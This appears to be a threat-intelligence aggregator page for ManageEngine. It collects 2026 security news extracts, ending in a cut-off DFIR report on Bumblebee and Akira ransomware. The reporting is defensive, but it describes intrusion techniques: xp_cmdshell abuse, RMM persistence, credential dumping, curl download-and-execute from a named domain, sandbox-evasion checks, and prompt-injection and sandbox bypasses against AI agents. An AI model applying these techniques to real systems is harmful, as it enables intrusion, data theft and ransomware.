Search/manageengine
Vendor

manageengine

Known CVEs
0
Highest CVSS
In KEV
0
Vendor
device expert
Connections
56 relationships
Cybersecurity attention fades within months after a breach
Cybersecurity attention fades within months after a breach Cybersecurity attention often rises after an incident, then recedes as organizations return to their existing priorities and practices, according to a new ManageEngine survey of 700 IT and cybersecurity leaders in the US and Canada. (Source: ManageEngine) All of them had already been through a breach or incident. Still, 91% said they trust their organization’s current cybersecurity posture. Only 8% said cybersecurity becomes a permanent priority once the incident is behind them. “The belief that breaches are inevitable has lowered the bar for security,” said Dr. Erik Huffman, a cyberpsychology researcher who commented on the findings. “We’ve said ‘it’s not a matter of if, but when’ for far too long. But we still have control over the security processes that directly influence the outcome.” Confidence that outpaces prevention A third of respondents believe a major incident is inevitable regardless of their defenses, and a similar share accept the risks they consider manageable. Known gaps often stay open until an audit or an actual incident forces the issue. Only a minority said security gets consistent attention throughout the year, outside the aftermath of an incident. “It is unfortunate that we have accepted the idea that bad things will happen no matter what we do,” he said. “Many organizations buy security tools in pursuit of the outcome of being ‘secure.’ But security cannot simply be bought or sold. It is an ever-evolving process and should be treated as such.” The urgency fades fast Right after a breach, organizations do react. Process discussions ramp up, urgency spreads through the team, and technical fixes go in, such as patching, access reviews, and backup improvements. That attention rarely lasts. Eighty percent of respondents said increased focus on cybersecurity holds for only one to six months before it fades. Close to half of organizations kept their existing structures and strategy in place after the incident, making no wider change at all. A smaller share made targeted fixes aimed at the specific gap that caused the incident, and fewer still made broader, long-term changes to governance, training, or escalation. Business priorities are often the reason why. A majority of respondents said competing demands regularly cause security initiatives to be postponed or downgraded, and one in five named exactly that as the leading factor behind their most recent incident. Fear shapes what gets said after the fact Most employees, according to respondents, report a mistake immediately when it happens. 83% admitted that fear of consequences influences how the incident is handled once it’s reported, and a notable share described their organization’s response as blame-focused. “Cybersecurity has had a fear-based culture for a long time, and it has created an environment many people want to avoid,” Huffman added. “Incident response should not be about who did what. The focus should be on what happened, why it happened, and who it impacts.” Part of the problem, according to the survey, is that ownership itself is unclear. Close to one in five respondents said they weren’t sure whether security, IT, or business teams should be responsible for a given failure. That uncertainty carries a cost, including delayed remediation, business disruption, and a higher risk that data ends up exposed before anyone closes the gap. AI recommendations often go unchecked AI use is widespread among these organizations, running incident response automation, threat intelligence, penetration testing, and vulnerability scanning. A large majority said it has made decisions easier to reach, and more than half credit it with greater efficiencies or stronger security capabilities. AI has also made a majority of respondents more willing to accept cyber risk. Among organizations using AI in cybersecurity, about two in three said they often or always act on its recommendations without additional verification. “AI undoubtedly introduces new risks for organizations,” Huffman noted. “LLMs are frequent targets for attackers because of the level of trust people place in the information they receive from AI systems. We need to move from ‘trust but verify’ to ‘verify, then trust.'” “Organizations that genuinely learn from incidents aren’t just the ones that respond quickly. They’re the ones that preserve visibility after the crisis, make risk decisions explicit, and turn temporary urgency into lasting discipline,” researchers concluded.
helpnetsecurity.comSep 14, 2026extracted
UK Moves to Block High-Risk Tech Suppliers From Critical Infrastructure
The UK Cyber Security and Resilience Bill (CSRB) has been given late amendments specifically targeting the supply chain threat against the nation’s critical infrastructure. The UK CSRB – not to be confused with the US Cyber Safety Review Board (CSRB) – was introduced to Parliament in November 2025. It has successfully completed all necessary steps through the House of Commons, has moved to the House of Lords (as HL Bill 32) and is now close to receiving Royal Assent. Royal Assent is the point at which the Bill becomes an Act of Parliament and part of UK legislation, where it transitions into the Cyber Security and Resilience (Network and Information Systems) Act. At any time, both a bill and an act can be amended. An example has occurred recently. On August 22, 2026, The Telegraph newspaper reported that Iran-linked adversaries had targeted and forced a small-scale UK energy facility offline for four days. In itself, the attack had no serious effect but did raise questions over the potential effect of wider supply chain attacks on critical industry. The government reacted rapidly, and on August 24, 2026, tabled amendments to the CSRB underscoring an urgent need to give ministers powers to prevent (block) critical-sector organizations from using technology suppliers deemed high risk. “The confirmation that a UK energy generator was taken offline for four days following a cyber-attack, alongside government moves to widen the Cyber Security and Resilience Bill’s supply chain provisions, brings a long running policy debate into sharp focus. The incident involving the energy generator and the purported involvement of a nation state, has clearly sharpened appetite for the bill’s power to designate critical suppliers, regardless of sector or size,” comments Darren Guccione, CEO and co-founder at Keeper Security. “This Bill makes a critical distinction – that a hacker who can take a hospital offline, or compromise a water supply isn’t an IT problem, they’re a public safety threat,” adds Shankar Haridas, UK business head at ManageEngine. Jamie Akhtar, CEO and co-founder at CyberSmart, explains, “The proposed measures are another clear sign that supply chain security is becoming a national resilience issue, as well as a concern for individual businesses. Critical infrastructure organizations may have sophisticated security controls of their own, but their defenses can quickly be undermined if attackers are able to exploit a smaller, less well-protected supplier further down the chain.” The CSRB already contains stringent requirements, with very strict incident reporting timelines and heavy penalties for failure. Blocking individual companies takes it to a different level. “Attackers rarely go through the front door of a well-defended organization. The majority go through a vendor with lighter security, a managed service provider with standing access, or a supplier nobody has audited in years,” comments Guccione. Keeper’s own research shows that 34% of UK organizations report incidents involving third-party vendors or suppliers. It’s an interesting approach. Improve the security of the critical infrastructure not by demanding it implements better in-house security, but by disconnecting them from the third-party suppliers they consider to be inadequately secure. “Many SMEs won’t necessarily think of themselves as part of the UK’s critical infrastructure,” continues Akhtar, “but if they provide technology, services or access to organizations operating in critical sectors, their cyber resilience matters massively. Attackers understand this and will naturally look for the easiest route into their ultimate target.” He continues, “The Cyber Security and Resilience Bill reflects a wider shift towards greater accountability for third-party risk. Ultimately, the UK’s critical infrastructure is only as resilient as the organizations connected to it, and that means raising the baseline of cybersecurity across the entire supply chain,” concludes Akhtar. The supply chain threat is not new, but it continues to grow. The UK’s Cyber Security and Resilience Act will have teeth to force the weak point origin of supply chain attacks to make greater effort to ensure their own security. The target is the supply chain, but the bullseye is the SME origin. So, the message to SMEs serving the UK critical infrastructure is simple: improve your own cybersecurity lest your future profitability be affected by the UK government when the CSRB becomes the CSRA. Related: Rust Supply Chain Attack Linked to North Korean Hackers Related: Over 2,500 Organizations Impacted by LiteLLM Supply Chain Attack Related: Over 400 NPM Packages Infected in ChainDrop Supply Chain Attack
securityweek.comSep 2, 2026extracted
NCSC Publishes Guidance to Aid Incident Response and Recovery
The UK's National Cyber Security Centre (NCSC) has published a detailed guidance document designed to help organizations hit with a cyber-attack that “disrupts, disables or damages” their critical systems. The document, What To Do When Cyber-Attacks Disrupt Your Organisation, is split into three sections, reflecting the three main chronological stages following an attack. These are: The first few hours and days, which includes “swift defensive actions, establishing governance and getting control of communications.” The NCSC recommended organizations engage an incident response firm vetted by the agency at this stage Building and implementing a recovery program in a way that gets the organization back to minimum viable operations (MVO). This may require temporary workarounds Longer term recovery to business as usual, which involves addressing the issues that caused the incident and rebuilding in a more secure and resilient way The NCSC’s CTO for economy and society, Ralph B, explained in a blog post on July 27 that the best course of action is to prepare for incidents before they take place, so that recovery and response is faster. “It’s a bit like training for a marathon. Reading about the race, buying the right equipment and writing a training plan are a good start. But it’s the actual running – regularly putting in the miles and building endurance – that prepares you for race day,” he said. “In the same way, it’s vital that organizations don’t just document a plan, but actually practice and test their response to disruptive incidents. Testing failover systems, rehearsing shutdown and restart procedures, and rebuilding systems from backups can all provide valuable real world lessons.” In this regard, realistic simulation exercises are more useful than tabletop approaches, as they help organizations build the “muscle memory” they need to respond effectively under pressure, he continued. Attacks More Likely Than Ever The guidance is well timed, given escalating threat levels. Data released by ManageEngine earlier this year revealed that 77% of British organizations suffered a cyber incident over the past year, 11% above the European average. The NCSC has repeatedly urged organizations to invest in resilience measures, arguing that rapid technological change, geopolitical uncertainty, and the evolution of the threat landscape have made these perilous times for security teams. It recently warned that AI is already helping adversaries conduct offensive activity at much greater speed and scale than before, reducing the time available for defenders to respond, detect and contain threats. Earlier in July, the NCSC announced new plans for a national cyber-defense capability powered by agentic AI, claiming that threat actors will soon be able to launch “fully autonomous attacks operating across the complete intrusion lifecycle.”
infosecurity-magazine.comJul 29, 2026extracted
A new extortion cocktail: office printers, small ransoms, and BitLocker
Recently, our teams in Latin America investigated a series of incidents involving misconfiguration, the deployment of BitLocker, and the exploitation of corporate printers. Attackers used the devices to notify organizations that their infrastructure had been compromised and they had to pay a ransom to recover their data. This article analyzes two incidents that occurred in June in Colombia and in May in Mexico. We highlight the similarities in the attackers’ communications and outline emerging trends in ransom amounts. Initial sign of an attack In both cases, the affected users initially noticed a padlock icon next to their drives in Windows Explorer. This indicated that the drive was encrypted with BitLocker, blocking access to its contents. A recovery key was required to unlock the drive. This is not the first time we have seen such threats; a few years ago, our team discovered a threat known as ShrinkLocker, which utilized BitLocker to achieve its goals. First case: abusing RDP to encrypt data One of the incidents occurred in Colombia in June. The attackers exploited an internet-exposed RDP service on a machine connected to an 8 TB storage device containing mission-critical data. After taking control of the system and manipulating user credentials, the attackers enabled BitLocker exclusively on the drive that primarily stored financial data. Once the encryption was complete, they locked the drive and used the company’s printers to produce ransom notes. Unfortunately, it was not possible to obtain evidence in the case due to the company’s rush to restore the encrypted disk. The communication with the attackers revealed a demand for just $3,000, and the company considered paying the ransom. After that, the system was restored before the forensic team could take any action, eliminating the evidence needed to assess the incident. This attack was made possible by an internet-facing remote desktop service (RDP) with additional open ports, which employees used to access corporate information. By exploiting this network exposure and misconfiguration, attackers breached the system, identified an additional drive, and leveraged BitLocker to encrypt the data and demand a ransom payment. Leaving RDP ports open without proper security controls jeopardizes the security of systems and information, as highlighted in the our “Global Report: Anatomy of a Cyber World“. The company confirmed that, due to compatibility issues with applications required for operation, EPP (Endpoint Protection Platform) protection was disabled on the system, making it easier for attackers to validate, enumerate, and execute applications without revealing malicious activity to central monitoring systems. Second case: meet the XEntry Team In another incident, which occurred in Mexico in May, our team identified how the threat actor gained initial access to the infrastructure. They exploited a misconfigured MSSQL service. This allowed them to execute commands on the system after obtaining the database login credentials from code insecurely published on GitHub. In this incident, the attack began three months prior to detection, with the intruder discovering and verifying their access to the environment. After confirming their access and privilege level within the MSSQL server settings, which extended beyond the DBMS to the underlying operating system, the attackers initially focused on manipulating certain aspects of the web server configuration on the same system. They lowered the server’s security settings and created web shell files in the publicly accessible folders. Many of these attempts to manipulate the service or create malicious files were contained by existing EPP security controls, but despite the alerts, the necessary investigation to address the activity was not conducted. The attackers subsequently confirmed their ability to execute commands locally and set up their attack infrastructure to transmit data via a communications bridge. By exploiting the MSSQL service, they gained access to each of the organization’s internal systems. The database engine used by the company was Microsoft SQL Server 2019.0150.2160.04, misconfigured to allow operating system сommand execution via the xp_cmdshell extended stored procedure. Due to this misconfiguration of an internet-exposed service, the attackers established a channel capable of executing any type of command directed at the server and the local infrastructure within its scope. One of the main objectives was to identify shared systems and resources that provided access to critical information. Our analysis confirmed the attackers’ access to systems storing configuration parameters for networking, enterprise management, and cloud services, among others. In early May, the attackers focused on running additional scans and deploying ManageEngine’s Endpoint Central RMM (Remote Monitoring and Management) to establish persistence and begin the final stages of their intrusion. Further RMM-type applications, such as Mesh Agent and Tactical RMM, were installed in the days that followed. These were used to deploy scheduled tasks responsible for enabling the BitLocker service and individually encrypting the infrastructure’s disks, generating a key for each encrypted system. Finally, in mid-May, the attackers managed to execute a Group Policy Object (GPO) used to deploy activation and encryption tasks, as well as other policies responsible for continued deployment of RMM applications via scheduled tasks. The activity initially targeted critical systems but later spread to every system synchronized with the domain controller. Users became aware of the attack when their machines displayed a blue screen with the message “Hacked by XEntry Team”, and their credentials stopped working to access their systems. A few hours later, ransom notes began emerging from office printers. These cases confirm that adversary’s objective is to gain access to infrastructure while avoiding investment in or partnership with ransomware groups. Instead, they leverage built-in Microsoft tools to facilitate data encryption and ransom payments. Monitoring and centralizing logs on protected resources, as well as promptly managing alerts, are critical to countering this type of intrusion. Conclusions Although the systems under review had security measures in place, there was a lack of proper alert management or inadequate decisions regarding application incompatibilities. We strongly recommend configuring the Remote Desktop Protocol (RDP) in strict accordance with cybersecurity best practices to prevent unauthorized access. This is especially critical: according to our Global Report: Anatomy of a Cyber World, more than 13% of incidents are related to policy violations and configuration errors, confirming that misconfigurations continue to pose a significant risk. Organizations should prioritize strict application control policies and active monitoring of network traffic for command-and-control (C2) communications. This is especially critical: according to the same report, more than 20% of incidents involved the abuse of RMM (Remote Monitoring and Management) tools for execution and C2 strategies. The fact that attackers used more than three distinct tools to gain control during a single incident further underscores the urgent need for these measures. Some questions remain unanswered due to a lack of evidence and a hasty system restoration effort that bypassed critical stages of the incident response process. It is important to ensure an adequate incident response procedure, preserving evidence to confirm all related activities, and adjusting or proposing controls to prevent future incidents involving similar TTPs. Although the ransom notes do not reveal a clear connection between the actors, certain words used in the messages, as well as the method of delivery and communication, may confirm a link: “As a guarantee, we have no negative online reviews about non-fulfillment of our obligations…” (Ransom note from the first case) “Our reputation is the guarantee that all content will be fulfilled…” (Ransom note from the second case) Our teams continue to monitor these threats. Detection signatures Trojan.Multi.Agent.gen Trojan.Win32.GenAutorunMsSqlServerCommandRun.a Trojan.Win32.Generic Exploit.Win32.SCShell.a
securelist.comJul 21, 2026extracted
ThreatsDay: Cloud Bucket Hijacking, Windows LPE Chain, Global Fraud Bust + 17 More Stories
Most security mess starts as admin work. A link gets clicked. A tool gets trusted. A bucket name gets reused. A setting stays loose because nobody wants to touch it. This week is full of that kind of damage. Not loud. Not clever. Just small gaps doing big jobs. The worst part is how normal it all looks until the bill arrives. The full ThreatsDay list is below. Global fraud bustA global anti-fraud operation involving 97 countries and territories has resulted in the arrest of 5,811 individuals and the interception of $293 million in illicit assets as part of an operation codenamed First Light 2026 that took place between January 15 and April 30, 2026, to tackle social engineering scams and associated money laundering activities. "Over 142,000 victims globally were identified during Operation First Light 2026, highlighting the extent to which social engineering scams and fraud have escalated into a major transnational threat, affecting individuals, businesses, and governments," INTERPOL said. More than 23,000 cases were solved, and 15,606 suspects have been identified. In Eswatini, authorities arrested 82 people and dismantled a criminal network running illegal online gambling, money laundering, and elaborate impersonation scams. The Thai police made two arrests and uncovered a money laundering scheme that converted illicit funds from romance scams into various cryptocurrencies, using cross-chain token swaps to obscure the financial trail. Payment SDK typosquatsA cluster of 17 malicious npm and PyPI packages have been found to typosquat Paysafe, Skrill, and Neteller SDKs to steal system information and developer secrets, and exfiltrate them to an Ngrok endpoint. The malware skips machines that have less than two CPU cores, and the hostname or username contains sandbox, analyzer, cuckoo, virus, malware, vmware, or vbox. "The threat actor targeted payment app SDKs, which might indicate a financial motive or the desire to monetize using payment app accounts," Socket said. "The threat actor used their obfuscator 'properly.' They did not re-use the same obfuscation key across versions or packages, which is intended to prevent signatures from tracking this malware by the same key. This resulted in different hashes for each file." Stealthy code injectionCybersecurity researchers have outlined a technique called Process Parameter Poisoning (P³) that can be used to code in foreign processes without raising any security alarms. "P³-Shellcode Loader is a loader that implements a code injection technique which leverages the Process Parameters structure (Process Parameter Poisoning) as an execution and staging location for shellcode injection into remote processes, without triggering common detection mechanisms," researchers Max Hirschberger and Ogulcan Ugur said. "One major advantage of this technique is that no processes are created in a suspended state and no threads or processes are suspended during its execution." Unauthenticated file accessA critical security flaw in Esri ArcGIS Server 12.0 and prior (CVE-2026-9181, CVSS score: 9.8/7.5) could be exploited to access sensitive files on the system without requiring valid credentials by sending crafted path parameters. "The vulnerability exists in the ArcGIS Server REST Uploads resource, where insufficient validation of crafted path parameters allows an unauthenticated remote attacker to traverse outside the intended directory boundary," Horizon3.ai said. Ransomware tooling overlapA new analysis of the Interlock (aka Hive0163) ransomware operation has identified links with TAG-124 (aka KongTuke and Landupdate808). The threat actor is known to employ a variety of mostly custom malware, including NodeSnake, Interlock RAT, JunkFiction downloader (aka Dormouse), Supper (aka SocksShell and WINDYTWIST), and JunkFiction cryptor. IBM X-Force said it has discovered strong overlaps between NodeSnake, ModeloRAT, JunkFiction downloader, Interlock RAT, and Supper malware variants, indicating a shared original codebase or possibly common developers. Rhysida, on the other hand, often uses Endico downloader, Broomstick (aka Oyster or CleanUpLoader), Supper, and Tomb cryptor (aka Textshell or pkr_mtsi). Evidence indicates a relationship with IceNova (aka Latrodectus) operators and ITG23 (aka TrickBot). Early versions of JunkFiction date back to May 2024, with the downloader being used to Supper, which then delivers CrossTec Remote Control, a legitimate remote administration tool. "The fact that both ModeloRAT and NodeSnake were deployed by TAG-124/KongTuke, possessed overlaps with other malware families belonging to the Interlock toolkit and used the same exploit during their operations, supports the theory that these activities may be linked," IBM X-Force said. Claude data warningChina's National Vulnerability Database (CNVDB) is urging developers to uninstall recent Claude Code versions over concerns that they can gather sensitive user data without consent. The "backdoor code" can collect details such as a user's location and identity, and forward them to remote servers. The agency said the alert only applies to Claude Code versions 2.1.91 (April 2) to 2.1.196 (June 29). "It is recommended that relevant units and users immediately conduct a comprehensive investigation," CNVDB said. "For development terminals with the above-mentioned affected versions installed, immediately uninstall or upgrade to the latest secure version with the relevant backdoor code removed; strengthen the control of external access permissions and traffic monitoring of development tools within core business network segments to prevent the unauthorized transmission of sensitive data." The disclosure comes shortly after a report that Claude contained covert code designed to prevent Chinese AI companies from extracting details about its inner workings. Anthropic subsequently said it was an experiment to protect against model distillation. Teams support lureA social engineering campaign has combined email phishing with a fake IT support scam abusing Microsoft Teams calls to deliver EtherRAT. "The attack lures the victim with a fake 'Employee Survey' email and PDF, then pivots to a Microsoft Teams call from an actor impersonating a 'System Administrator,'" Palo Alto Networks Unit 42 said. "The actor abuses Teams remote control (give/request control) to control the victim's machine, then guides the victim to install different remote RMM tools to establish persistence - HopToDesk and AnyDesk. The actor uses cmd.exe > curl.exe to download a malicious MSI (v7.msi) from camorreado[.]click and execute it. The MSI is a multi-stage loader that downloads a legitimate Node.js runtime, decrypts an embedded payload through a multi-step cipher chain, and runs EtherRAT." Scattered Spider linkThe notorious cybercrime group known as Scattered Spider is called by various names, including Octo Tempest, Muddled Libra, and UNC3944. Group-IB, which designated the term 0ktapus to a social engineering attack campaign targeting Twilio in August 2022, said Scattered Spider can be best described as a decentralized cybercrime collective analogous to The Com, with 0ktapus acting as a sub-cluster within the group. Scattered Spider comprises smaller clusters that are united by the use of shared tradecraft and English as a common language, but act separately. "Physical device theft activity from mobile carrier stores has been observed in at least one subcluster, for SIM swapping purposes," Group-IB said. "Subclusters target all kinds of sectors, either as end-targets for direct exploitation or as stepping stones to gather intelligence or tools for future attacks." The end goal of these attacks is cryptocurrency theft and ransomware, leading to extortion. LINE espionage schemeTaiwanese authorities have charged two local businessmen with allegedly assisting Chinese government-linked hackers carry out a sprawling espionage campaign targeting politicians, academics, journalists, and civil society groups. The suspects are believed to have run a company that collected and leased accounts for the LINE messaging app to operators linked to China's cyber forces. The accounts were then used to impersonate international journalists and build trust with targets and ultimately deliver malware designed to compromise their computers. The LINE accounts were rented by a Chinese firm named Xiamen Empress Information Technology. Meta phishing abuseAn unknown threat actor is manipulating Meta's Business Account Manager to send spam emails that bypass email filters since at least November 2025 and trick victims into providing their Meta account details to the attacker on attacker-controlled web pages. The emails were sent from a Meta business account. "Starting in June, they modified their phishing lure to incorporate a chatbot, run through a fraudulent account on Facebook Messenger, and began sending credentials to a private Telegram channel," Huntress said. "The phishing campaign appears to target businesses and attempts to capture credentials, MFA codes, business and personal phone numbers, email addresses, and an image of the target's ID or passport." Meta has since taken steps to plug the attack method. Windows LPE chainIn August 2025, SafeBreach researcher Ron Ben Yizhak disclosed details of an issue (CVE-2025-49760) in Microsoft's Windows Remote Procedure Call (RPC) communication protocol that could be abused by an attacker to conduct spoofing attacks and impersonate a known server. Then, in October 2025, Microsoft addressed another vulnerability tracked as CVE-2025-59200, which has been described as a spoofing flaw in the Data Sharing Service Client. "By exploiting a vulnerability in the Data Sharing Service (DsSvc) – tracked as CVE-2025-59200 – an attacker can spoof an RPC server, then send a hotkey that bypasses User Interface Privilege Isolation (UIPI) to start a scheduled task," Ben Yizhak said. "The task sends an RPC request to the spoofed server of the attacker and the response injects an XML into a toast notification to elevate privileges from low to medium integrity." Kernel driver flawsMultiple vulnerabilities have been disclosed in RtsPer.sys, an SD card reader driver developed by Realtek. These vulnerabilities enable non-privileged users to leak the contents of the kernel pool and kernel stack, write to arbitrary kernel memory, and read and write physical memory from user mode via the DMA capability of the device, per a security researcher who goes by the name "zwclose." The issues impact many OEMs, including Dell, Lenovo, and possibly other laptops equipped with an SD card reader manufactured by Realtek. The issues have been assigned the CVEs: CVE-2022-25477, CVE-2022-25478, CVE-2022-25479, CVE-2022-25480, CVE-2024-40431, and CVE-2024-40432. The complete set of fixes was released by Realtek in August 2024. New ransomware behaviorRansomware attacks that deploy WhiteLock involve the locker communicating with external servers during the encryption process and terminating Services related to remote access tools, such as AnyDesk and TeamViewer, to prevent victims from responding remotely. "After registering an infected device, WhiteLock checks whether AnyDesk and TeamViewer are installed on the victim's device," AhnLab said. "If these tools are present, it terminates the relevant Services in subsequent stages. This behavior is interpreted as an attempt to prevent security personnel or administrators from isolating the infected system or responding in real time through remote access tools." Another new ransomware entrant is Prinz Eugen, which was first detected in May 2026. "The encryptor is freshly built, written in Go, and more technically deliberate than many first-wave ransomware samples," Threatdown said. "It performs recursive encryption, prioritizes recently modified files, uses ChaCha20-Poly1305 with integrity checks, and leaves no ransom note on disk." The ransomware is advertised by a threat actor named ROOTBOY on underground forums, who has previously engaged in data sale and extortion activity between July and November 2025. The development comes as the Bumblebee malware loader, deployed via SEO poisoning through a trojanized installer for ManageEngine OpManager, has been leveraged by threat actors to drop AdaptixC2, which then acts as a conduit for Akira ransomware deployment. Chrome extension hijackCybersecurity researchers have flagged a new browser-based threat dubbed GhostChrome-X that uses Google Chrome to establish and maintain access to compromised hosts. "Two aspects in particular make GhostChrome-X noteworthy. First, the malware directly targets Chrome's extension trust model by modifying protected configuration files and forging the integrity metadata required for Chrome to accept an attacker-controlled extension as a legitimate browser component," Rubrik Zero Labs said. "Second, rather than functioning solely as a data-stealing extension, GhostChrome-X integrates browser-based access with operating system-level command execution, enabling the browser to serve as a persistent platform for ongoing attacker operations." Once active, the malware establishes persistence using scheduled tasks and Registry Run keys, while communicating with an external server to collect browser cookies, browsing history, and submitted form data. It also supports remote command execution on the infected system and "monitors WebAuthn activity and enables attacker-controlled interactions with WebAuthn-enabled websites from within the victim's browser session." Tax refund RAT lureA phishing and malware campaign is using Indian Income Tax Return (ITR) refund lures to deliver a multi-stage AutoIt infection chain that leads to the deployment of AsyncRAT. The campaign has targeted financial and technology organizations. "The operation is notable for the way it combines credible email delivery, compromised web infrastructure, Dropbox-hosted payloads, password-protected archives, AutoIt staging, sandbox-aware execution, persistence, process injection, and a final .NET RAT payload," ZeroBEC said. "More recent samples shifted to LX RAT, a commercially marketed remote access trojan protected by the LX Crypter / LX Protector ecosystem." Fraudulent tax assessment notifications have also been used to distribute a trojan-like payload to targeted users using DLL side-loading techniques. The rogue DLL features persistence mechanisms, system information discovery, user activity monitoring, dynamic payload execution, and encrypted command-and-control (C2) communication. "The observed capabilities -- including modular payload loading, encrypted communication, persistence mechanisms, and remote execution functionality -- indicate that the campaign is designed to establish unauthorized access to and maintain control over compromised hosts," CYFIRMA said. Fileless Remcos loaderAnother campaign targeting India, this time using GST-themed ZIP archive lures to deliver a variant of the Remcos RAT malware family. "One notable characteristic of this infection chain was its reliance on in-memory execution techniques / fileless malware and Steganography," K7 Labs said. "By avoiding disk-based artifacts, the threat reduces forensic evidence and increases its ability to evade traditional security tools and signature-based detection methods." Teams access phishAn active phishing campaign is using Microsoft Teams-themed lures to distribute a legitimate remote access tool configured for unauthorized access. "Victims are directed to convincing landing pages that impersonate collaboration and productivity services, where they are prompted to download software presented as a meeting transcript viewer, recording utility, or document-related application," CYFIRMA noted. "The use of compromised business websites provides reputational legitimacy, while dedicated infrastructure enables rapid deployment and campaign scalability. The operation demonstrates active maintenance, with the majority of identified infrastructure observed within the last three to six months, indicating continued development and operational investment." ADFS token forgery riskGoogle-owned Mandiant has revealed that "when ADFS certificates are manually rotated, configuration drift can silently leave active signing keys exposed in Machine DPAPI," adding "in environments where AutoCertificateRollover is disabled, and certificates are manually rotated, the database often becomes a 'ghost'—a record that still exists, still decrypts successfully, but references a certificate no longer used for token signing by the ADFS service." The tech giant has warned that the technique could be exploited by bad actors to forge high-privilege SAML tokens. Cloud exfiltration controlsAmazon Web Services (AWS) has emphasized the need for a layered strategy for egress security and to prevent data exfiltration. "Without egress controls in place, that outbound traffic can flow freely, and the unauthorized access might go unnoticed until a compliance audit, customer complaint, or incident notification forces discovery," AWS said. The risk is compounded by agentic AI systems, in which an unauthorized party can manipulate an autonomous agent’s objectives to silently exfiltrate data and achieve code execution. "As organizations deploy AI agents with access to tools, APIs, and code interpreters, these agents become high-value targets, and their outbound network activity must be constrained with the same rigor as any other workload," AWS said. Cloud data reroutingPalo Alto Networks Unit 42 has identified a bucket hijacking technique that impacts major cloud service providers. It has been described as a fundamental architectural flaw. "An attacker can silently compromise an organization's active data streams by rerouting data into an external storage bucket," Unit 42 said. "Because a storage bucket name is globally unique, an attacker can simply delete the bucket and then recreate it under the attacker's own account using the same name. This, therefore, creates a global namespace risk. This bucket hijacking reroutes critical logs and sensitive data directly to the attacker's environment." A similar attack method, dubbed Bucket Monopoly, was detailed by Aqua Security in 2024. There is no evidence that the attack technique has been abused in the wild. In recent weeks, Unit 42 has also warned that: (1) insecure default configurations and overly permissive enrollment rights in Active Directory Certificate Services (AD CS) can be exploited for privilege escalation, unauthorized identity impersonation, and persistence; (2) Kubernetes identities can be abused in combination with exposed attack surfaces to escalate privileges from initial access to sensitive backend cloud infrastructure; (3) multi-agent AI systems can introduce new pathways for exploitation through inter-agent communication and orchestration via prompt injection due to a model's inability to reliably differentiate between developer-defined instructions and adversarial user input, and a lack of agent capability scoping and tool input sanitization; (4) Amazon Bedrock AgentCore's Code Interpreter sandbox network isolation mode can be bypassed to allow sending and receiving of data from external endpoints via DNS tunneling by taking advantage of a lack of session token enforcement; and (5) AgentCore starter toolkit's auto-create logic generates identity and access management (IAM) roles that grant privileges broadly across the AWS account, rather than being scoped to individual resources, effectively introducing what's called an Agent God Mode that makes it possible to escalate privileges and compromise every other AgentCore agent within the AWS account. The useful lesson this week is not “watch for weird behavior.” Weird is late. By then the fake support call has a session, the package has run, the bucket is gone, and the quiet process already has somewhere to send data. Watch the normal paths instead. Names that look almost right. Tools asking for slightly too much. Services that still trust old state. Traffic that should have had nowhere to go. Most of the damage here did not need magic. It needed permission, habit, and nobody looking closely enough.
thehackernews.comJul 9, 2026extracted
From Bing Search to Ransomware: Bumblebee and AdaptixC2 Deliver Akira
Key Takeaways In July 2025, BumbleBee malware was deployed via SEO poisoning through a trojanized installer for ManageEngine OpManager. Following initial access, BumbleBee dropped an AdaptixC2 beacon to facilitate further intrusion activities, allowing the threat actor to pivot to a domain controller and dump the NTDS.dit. The threat actor returned the following day and established an SSH proxy, enabling lateral movement across the network and data exfiltration via FileZilla and SFTP to an external server. The threat actor concluded the intrusion by deploying Akira ransomware across the root domain and returned two days later to encrypt a child domain. This case was first reported to customers in a threat brief released in July 2025 and in a public flash alert in August 2025 in partnership with Swisscom B2B CSIRT, which observed another intrusion tied to the same campaign. This report contains data from both intrusions. We plan to release a DFIR Labs case based on this report later this quarter. Case Summary The BumbleBee intrusion was initiated in July 2025 via an SEO poisoning attack that lured a user searching for “ManageEngine OpManager” to a look-alike domain. Upon downloading a trojanized MSI installer, the BumbleBee first-stage loader (msimg32.dll) was executed on a beachhead host via DLL side-loading. The loader immediately established command-and-control (C2) communication with threat actor-controlled infrastructure. Approximately five hours after the initial infection, the threat actor deployed AdgNsy.exe, a renamed instance of the legitimate Windows Address Book utility, which was injected with AdaptixC2 shellcode. This established a persistent C2 channel, enabling the threat actor to perform living-off-the-land discovery commands such as systeminfo and nltest to map the internal network. To ensure persistence, the threat actor created new domain accounts with Enterprise Admin privileges and installed RustDesk as a Windows service on multiple servers. On the second and third days, the threat actor moved laterally using RDP to pivot to a domain controller and a backup server. They engaged in extensive credential harvesting, utilizing wbadmin.exe to extract the NTDS.dit Active Directory database and executing custom PowerShell scripts to dump and decrypt Veeam credentials via DPAPI. The threat actor also employed the lsassy utility to dump LSASS memory across multiple hosts. Throughout the intrusion, the threat actor leveraged defense evasion and tunneling techniques. This included using a reverse SSH tunnel to proxy RDP traffic and bypass firewall restrictions, as well as employing mixed-case command-line obfuscation (e.g., pOWerShELl.exE). In a parallel incident, they even used a Bring Your Own Vulnerable Driver (BYOVD) attack to neutralize endpoint security controls. Data exfiltration was primarily facilitated through FileZilla, which the threat actor likely introduced into the environment via RDP clipboard. Over 75GB of data, including file shares, sensitive user credentials, and SYSVOL domain configurations were exfiltrated to an threat actor controlled server in Ukraine. The intrusion culminated approximately 44 hours after initial access with the deployment of Akira ransomware (staged as locker.exe), which used WMI to delete Volume Shadow Copies and maximize impact across the infrastructure. If you would like to get an email when we publish a new report, please subscribe here. The DFIR Report Offerings Check out our Products here and our Services here. Want a demo, more information on our services, pricing or just want to chat? Get in Touch Analysts Analysis and reporting completed by Jake, Dino, Ahmed Farouk & Mattison Schuch. Reviewed by Angelo Violetti & Renzon Cruz Initial Access The BumbleBee intrusion was initiated in July 2025 via a SEO poisoning attack. A user searching Bing for “ManageEngine OpManager”, a network monitoring suite, was lured to opmanager[.]pro, a sophisticated lookalike domain. This site served a cloned interface that redirected the victim to download-center[.]online, ultimately delivering a trojanized MSI installer instead of the legitimate software. Forensic analysis of the browser history mapped the sequence of redirects leading to the malicious host. The victim subsequently moved the malicious MSI to an internal network share; from there, an IT administrator executed the file on the beachhead host. Delivery Infrastructure This intrusion aligns with a broader BumbleBee SEO poisoning campaign that Cyjax first identified in May 2025. The operation utilized a standardized, two-tier delivery architecture: Tier 1: Impersonation Front-ends – Malvertising domains (e.g., opmanager[.]pro ,zenmap[.]pro ) that appeared in Bing search results. These sites served high-fidelity clones of legitimate download pages to establish trust. Tier 2: Universal Delivery Gateways – Backend servers hosting trojanized MSI installers. By using a uniform URL parameter (/Get?q= ), the same 